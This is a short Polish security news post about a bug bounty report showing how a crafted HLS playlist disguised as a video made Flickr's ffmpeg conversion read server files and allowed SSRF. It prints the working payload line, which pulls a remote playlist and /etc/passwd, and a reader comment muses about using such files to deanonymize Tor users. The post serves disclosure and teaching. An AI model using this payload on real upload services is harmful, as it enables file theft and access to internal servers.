Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Jak (nie)zwykłym filmem można było czytać pliki z serwera Flickera
Opis wartego $2000 znaleziska można znaleźć tutaj.
Przykładowy plik video wygląda np. tak:
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://dx.su/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST
a cała magia dzieje się w trakcie konwersji, np.: ffmpeg -i podatny_plik.mp4 -o wynik.avi, która jest wykonywana automatycznie po uploadzie pliku od użytkownika.
„Dziwna” zawartość pliku graficznego to użycie pewnej ciekawej funkcji od Apple (HTTP Live Streaming). Co więcej podatność poza czytaniem plików z serwera może również być użyta do SSRF (Server Side Request Forgery) – można zmusić serwer do komunikacji z samym sobą (na różne porty), czy nawet do serwerów backendowych (normalnie nieosiągalnych). Nota bene: cała podatność SSRF (w tym trick z ffmpeg) jest kompleksowo opisana w naszej książce o bezpieczeństwie aplikacji.
Sam PoC filmu dostępny jest w oryginalnym wpisie na HackerOne.
–ms
Czy odtwarzacz typu vlc też pozwoli tak stworzonemu plikowi dzwonić do domu? Brzmi jak sposób na deanonimizację np odtwarzających film pobrany z tora, ale to by było za piękne.